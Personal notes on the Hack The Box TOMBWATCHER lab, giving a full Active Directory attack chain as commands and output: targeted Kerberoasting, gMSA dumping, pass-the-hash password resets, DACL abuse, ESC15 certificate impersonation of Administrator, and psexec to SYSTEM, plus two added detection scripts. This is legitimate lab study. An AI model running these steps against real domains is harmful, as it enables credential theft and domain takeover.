Here are my notes on the TOMBWATCHER box from Hack The Box.
TOMBWATCHER: 10.129.47.32
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
sudo bloodhound-python -u 'henry' -p 'H3nry_987TGV!' -ns 10.129.47.32 -d tombwatcher.htb -c all
HENRY -> WriteSPN -> ALFRED
targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
┌──(root㉿kali)-[/home/…/BOXES/TOMBWATCHER/10.129.47.32/BLOOD]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
[VERBOSE] SPN removed successfully for (Alfred)
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
basketball (?)
1g 0:00:00:00 DONE (2025-06-14 02:52) 10.00g/s 10240p/s 10240c/s 10240C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Alfred:basketball
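The chain above is what targeted Kerberoasting looks like from the defender's side: an SPN is written onto a user account, a TGS is requested for it with RC4, and the SPN is removed again a second later. The following detection logic is an added example, not part of these notes or of targetedKerberoast; it runs over constructed sample events shaped like Windows Security log fields (Event 5136 directory changes and Event 4769 ticket requests), and the field names used for the samples are my own simplification of the event XML.

```python
"""Detect the targeted-Kerberoast pattern: Event 5136 adds servicePrincipalName
on a user object, Event 4769 requests a TGS for that account with RC4 (0x17),
then Event 5136 removes the SPN again, all inside a short window."""
from datetime import datetime, timedelta

# Operation type codes carried by Event 5136
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"
RC4_ETYPE = "0x17"

# Constructed sample events (not real log data from the box)
EVENTS = [
    {"time": "2025-06-14T02:50:01", "id": 5136, "subject": "henry",
     "object": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "attr": "servicePrincipalName", "op": VALUE_ADDED},
    {"time": "2025-06-14T02:50:02", "id": 4769, "subject": "henry@TOMBWATCHER.HTB",
     "service": "Alfred", "etype": RC4_ETYPE},
    {"time": "2025-06-14T02:50:03", "id": 5136, "subject": "henry",
     "object": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "attr": "servicePrincipalName", "op": VALUE_DELETED},
    # benign: the DC renewing its own ticket with AES256
    {"time": "2025-06-14T02:55:00", "id": 4769, "subject": "DC01$@TOMBWATCHER.HTB",
     "service": "DC01$", "etype": "0x12"},
]


def rdn(dn):
    """Leading CN value of a DN, lower-cased: 'CN=Alfred,...' -> 'alfred'."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()


def find_targeted_kerberoast(events, window_minutes=15):
    """Return one finding per account where an SPN add, an RC4 TGS request for
    that account, and an SPN delete all happen within window_minutes.
    Each finding names who wrote the SPN, who requested the ticket, and when."""
    window = timedelta(minutes=window_minutes)

    def when(e):
        return datetime.fromisoformat(e["time"])

    spn_adds = [e for e in events if e["id"] == 5136
                and e["attr"] == "servicePrincipalName" and e["op"] == VALUE_ADDED]
    findings = []
    for add in spn_adds:
        account = rdn(add["object"])
        t0 = when(add)
        later = [e for e in events if t0 <= when(e) <= t0 + window]
        tgs = [e for e in later if e["id"] == 4769
               and e["service"].lower() == account and e["etype"] == RC4_ETYPE]
        removal = [e for e in later if e["id"] == 5136
                   and rdn(e["object"]) == account and e["op"] == VALUE_DELETED]
        if tgs and removal:
            findings.append({
                "account": account,
                "spn_written_by": add["subject"],
                "ticket_requested_by": tgs[0]["subject"],
                "spn_added": add["time"],
                "spn_removed": removal[0]["time"],
            })
    return findings


if __name__ == "__main__":
    for f in find_targeted_kerberoast(EVENTS):
        print(f"[ALERT] targeted Kerberoast on {f['account']}: SPN written by "
              f"{f['spn_written_by']} at {f['spn_added']}, RC4 TGS by "
              f"{f['ticket_requested_by']}, SPN removed at {f['spn_removed']}")
```

Event 5136 only fires if the Directory Service Changes subcategory is audited and a SACL on the user objects covers attribute writes; without that, the RC4 4769 for a user account is the remaining signal.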
Alfred -> AddSelf -> INFRASTRUCTURE Group
net rpc group addmem "INFRASTRUCTURE" "ALFRED" -U "tombwatcher.htb"/"ALFRED"%"basketball" -S tombwatcher.htb
python3 -m venv bloodyad-env
source bloodyad-env/bin/activate
https://github.com/CravateRouge/bloodyAD
git clone https://github.com/CravateRouge/bloodyAD
pip3 install .
bloodyAD --host "10.129.47.32" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"
WORKS !
net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb"/"ALFRED"%"basketball" -S "tombwatcher.htb"
┌──(bloodyad-env)─(root㉿kali)-[/home/kali/Kali-Tools]
└─# bloodyAD --host "10.129.47.32" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"
[+] alfred added to INFRASTRUCTURE
┌──(bloodyad-env)─(root㉿kali)-[/home/kali/Kali-Tools]
└─# net rpc group members "INFRASTRUCTURE" -U "tombwatcher.htb"/"ALFRED"%"basketball" -S "tombwatcher.htb"
TOMBWATCHER\Alfred
INFRASTRUCTURE Group -> ReadGMSAPassword -> ANSIBLE_DEV$ -> ForceChangePassword -> SAM -> WriteOwner -> JOHN -> CanPSRemote -> DC01:
python3 gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'
┌──(impacket-env)─(root㉿kali)-[/home/kali/Kali-Tools/gMSADumper]
└─# python3 gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::4b21348ca4a9edff9689cdf75cbda439
ansible_dev$:aes256-cts-hmac-sha1-96:499620251908efbd6972fd63ba7e385eb4ea2f0ea5127f0ab4ae3fd7811e600a
ansible_dev$:aes128-cts-hmac-sha1-96:230ccd9df374b5fad6a322c5d7410226
ansible_dev$:4b21348ca4a9edff9689cdf75cbda439
pth-net rpc password "SAM" 'Password123!' -U "tombwatcher.htb"/"ansible_dev$"%"ffffffffffffffffffffffffffffffff":"4b21348ca4a9edff9689cdf75cbda439" -S "tombwatcher.htb"
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# pth-net rpc password "SAM" 'Password123!' -U "tombwatcher.htb"/"ansible_dev$"%"ffffffffffffffffffffffffffffffff":"4b21348ca4a9edff9689cdf75cbda439" -S "tombwatcher.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# nxc smb 10.129.47.32 -u 'sam' -p 'Password123!' --shares
SMB 10.129.47.32 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.47.32 445 DC01 [+] tombwatcher.htb\sam:Password123!
sam:Password123!
python3 owneredit.py -action read -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
python3 owneredit.py -action write -new-owner 'SAM' -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
python3 owneredit.py -action read -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
python3 dacledit.py -action 'write' -rights 'FullControl' -principal sam -target 'JOHN' 'tombwatcher.htb'/'sam':'Password123!'
net rpc password 'JOHN' Password -U tombwatcher.htb/sam%Password123! -S dc01.tombwatcher.htb
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# nxc smb 10.129.47.32 -u 'john' -p 'Password'
SMB 10.129.47.32 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.47.32 445 DC01 [+] tombwatcher.htb\john:Password
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# nxc winrm 10.129.47.32 -u 'john' -p 'Password'
WINRM 10.129.47.32 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
WINRM 10.129.47.32 5985 DC01 [+] tombwatcher.htb\john:Password (Pwn3d!)
evil-winrm -i 10.129.47.32 -u john -p Password
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\john
*Evil-WinRM* PS C:\Users\john\Documents> hostname
DC01
USER-SHELL !
JOHN -> GenericAll -> ADCS@TOMBWATCHER.HTB
certipy find -u john@tombwatcher.htb -p 'Password' -vulnerable -stdout -dc-ip 10.129.47.32
certipy find -stdout -u john@tombwatcher.htb -p 'Password' -dc-ip 10.129.47.32
certipy ca -u john -p 'Password' -target tombwatcher.htb -dc-ip 10.129.47.32 add-template -template-name MyESC1Template
certipy template add -u john -p 'Password' -target tombwatcher.htb -dc-ip 10.129.47.32 \
-name MyESC1Template -ca tombwatcher.htb\\ADCS -scheme ESC1
Certipy = Rabbit Hole ?
#PRIV ESC Section:
JOHN -> GenericAll -> CERT_ADMIN@TOMBWATCHER.HTB
net rpc password "cert_admin" "Password" -U "tombwatcher.htb"/"john"%"Password" -S "10.129.123.182"
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
Nothing interesting from dirsearch.
Nothing interesting from nikto.
Time to do VHOST:
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://tombwatcher.htb/ -H "Host: FUZZ.tombwatcher.htb"
No interesting VHOST, and nothing from nikto against that VHOST either.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-14 05:09:01Z)
┌──(root㉿kali)-[/home/…/BOXES/TOMBWATCHER/10.129.47.32/SYSVOL]
└─# GetUserSPNs.py -request -dc-ip 10.129.47.32 tombwatcher.htb/henry:H3nry_987TGV!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
No entries found!
┌──(root㉿kali)-[/home/…/BOXES/TOMBWATCHER/10.129.47.32/SYSVOL]
└─# GetNPUsers.py -dc-ip 10.129.47.32 tombwatcher.htb/ -usersfile users.txt -format hashcat
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
/usr/local/bin/GetNPUsers.py:150: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Henry doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Alfred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sam doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ansible_dev$ doesn't have UF_DONT_REQUIRE_PREAUTH set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-14T05:10:21+00:00; +3h10m33s from scanner time.
ldapsearch -H ldap://10.129.47.32 -x -W -D "henry@tombwatcher.htb" -b "dc=tombwatcher,dc=htb" '(objectClass=person)' > ldap-people
No interesting description or password fields.
john is Remote management user.
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER/10.129.47.32]
└─# crackmapexec smb 10.129.47.32 -u 'henry' -p 'H3nry_987TGV!' --shares
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
SMB 10.129.47.32 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.47.32 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
SMB 10.129.47.32 445 DC01 [+] Enumerated shares
SMB 10.129.47.32 445 DC01 Share Permissions Remark
SMB 10.129.47.32 445 DC01 ----- ----------- ------
SMB 10.129.47.32 445 DC01 ADMIN$ Remote Admin
SMB 10.129.47.32 445 DC01 C$ Default share
SMB 10.129.47.32 445 DC01 IPC$ READ Remote IPC
SMB 10.129.47.32 445 DC01 NETLOGON READ Logon server share
SMB 10.129.47.32 445 DC01 SYSVOL READ Logon server share #Nothing Interesting about it = NOPE !
sudo lookupsid.py henry@10.129.47.32 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-14T05:10:22+00:00; +3h10m33s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-14T05:10:21+00:00; +3h10m33s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-06-14T05:10:22+00:00; +3h10m33s from scanner time.
5985/tcp open wsman
evil-winrm -i 10.129.47.32 -u john -p Password
*Evil-WinRM* PS C:\Users\john\Desktop> whoami
tombwatcher\john
*Evil-WinRM* PS C:\Users\john\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\john\Desktop> dir
Directory: C:\Users\john\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/14/2025 1:05 AM 34 user.txt
*Evil-WinRM* PS C:\Users\john\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
Get-ADObject -Filter {displayName -eq "cert_admin"} -IncludeDeletedObjects | Restore-ADObject
Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Alfred Guest
Henry john krbtgt
sam
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents>
*Evil-WinRM* PS C:\Users\john\Documents> Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents>
*Evil-WinRM* PS C:\Users\john\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Alfred cert_admin
Guest Henry john
krbtgt sam
The command completed with one or more errors.
https://a45hw1n.github.io/posts/tombwatcher-htb/
Restore Active Directory Deleted Objects Using Recycle Bin
JOHN -> GenericAll -> CERT_ADMIN@TOMBWATCHER.HTB
net rpc password "cert_admin" "Password" -U "tombwatcher.htb"/"john"%"Password" -S "10.129.123.182"
certipy find -vulnerable -stdout -u cert_admin@tombwatcher.htb -p Password -dc-ip 10.129.123.182
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
ESC15 Notes:
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
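The certipy remark above gives the ESC15 rule in one line: the enrollee supplies the subject, the template is schema version 1, and a low-privilege principal can enroll. The audit function below is an added example, not part of these notes or of certipy; it encodes that rule over constructed template records that mirror the listing above (the field names are my own, not certipy's JSON schema), and downgrades the finding when the CA is marked as patched for CVE-2024-49019.

```python
"""Flag certificate templates matching the ESC15 conditions certipy reported:
schema version 1 + EnrolleeSuppliesSubject + Enroll granted to a principal that
is not an administrative group. On a schema version 1 template the CA takes
application policies from the request, so a 'Server Authentication' template
can yield a certificate usable for other purposes on an unpatched CA."""

PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed samples: the WebServer template as listed above, a version 2
# copy of it, and a version 1 template only Domain Admins can enroll in.
TEMPLATES = [
    {"name": "WebServer", "enabled": True, "schema_version": 1,
     "enrollee_supplies_subject": True, "eku": ["Server Authentication"],
     "enroll": ["Domain Admins", "Enterprise Admins", "cert_admin"]},
    {"name": "WebServerV2", "enabled": True, "schema_version": 2,
     "enrollee_supplies_subject": True, "eku": ["Server Authentication"],
     "enroll": ["Domain Admins", "cert_admin"]},
    {"name": "AdminOnly", "enabled": True, "schema_version": 1,
     "enrollee_supplies_subject": True, "eku": ["Server Authentication"],
     "enroll": ["Domain Admins"]},
]


def low_priv_enrollers(template, privileged=PRIVILEGED):
    """Principals holding Enroll on the template that are outside the
    privileged set; these are the accounts ESC15 would be exercised from."""
    return [p for p in template["enroll"] if p not in privileged]


def esc15_findings(templates, ca_patched=False):
    """One finding per enabled template meeting all three ESC15 conditions.
    ca_patched=True means the CA carries the CVE-2024-49019 update, which
    lowers the severity to informational but still lists the template so the
    version 1 + EnrolleeSuppliesSubject combination gets cleaned up."""
    findings = []
    for t in templates:
        if not t["enabled"] or t["schema_version"] != 1:
            continue
        if not t["enrollee_supplies_subject"]:
            continue
        enrollers = low_priv_enrollers(t)
        if not enrollers:
            continue
        findings.append({
            "template": t["name"],
            "severity": "info" if ca_patched else "high",
            "enrollers": enrollers,
            "eku": t["eku"],
            "fix": ("recreate as a schema version 2 or later template, or drop "
                    "EnrolleeSuppliesSubject and restrict Enroll to an approved "
                    "group; install the CVE-2024-49019 update on the CA"),
        })
    return findings


if __name__ == "__main__":
    for f in esc15_findings(TEMPLATES):
        print(f"[{f['severity'].upper()}] {f['template']}: enrollable by "
              f"{', '.join(f['enrollers'])} -> {f['fix']}")
```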
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-application-policies 'Certificate Request Agent'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'cert_admin.pfx'
[*] Wrote certificate and private key to 'cert_admin.pfx'
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'User' \
-pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182'
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# faketime -f $(ntpdate -q tombwatcher.htb | awk '{print $4}') bash
/usr/lib/python3/dist-packages/ntp/util.py:641: SyntaxWarning: invalid escape sequence '\]'
m = re.match("([:.[\]]|\w)*", inhost)
/usr/lib/python3/dist-packages/ntp/util.py:1398: SyntaxWarning: invalid escape sequence '\%'
if not c.isalnum() and c not in "/.:[] \%\n":
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc
Alternative:
S-1-5-21-1392491010-1358638721-2126982587-1000
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'Password' \
-dc-ip '10.129.123.182' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' \
-application-policies 'Client Authentication'
certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182' -ldap-shell
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.123.182' -ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.123.182:636'
[*] Authenticated to '10.129.123.182' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# whoami
u:TOMBWATCHER\Administrator
#LDAP-SHELL WORKS !
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc Administrator@tombwatcher.htb
┌──(root㉿kali)-[/home/kali/BOXES/TOMBWATCHER]
└─# sudo rlwrap psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fc Administrator@tombwatcher.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on tombwatcher.htb.....
[*] Found writable share ADMIN$
[*] Uploading file wQZUorJS.exe
[*] Opening SVCManager on tombwatcher.htb.....
[*] Creating service tEer on tombwatcher.htb.....
[*] Starting service tEer.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is EFB6-9D96
Directory of C:\Users\Administrator\Desktop
06/04/2025 06:38 PM <DIR> .
06/04/2025 06:38 PM <DIR> ..
08/21/2025 06:15 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,572,669,440 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
9389/tcp open adws
49666/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
49681/tcp open unknown
49701/tcp open unknown
49713/tcp open unknown
49748/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE VERSION
53/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h10m32s, deviation: 0s, median: 3h10m32s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-14T05:09:41
|_ start_date: N/A
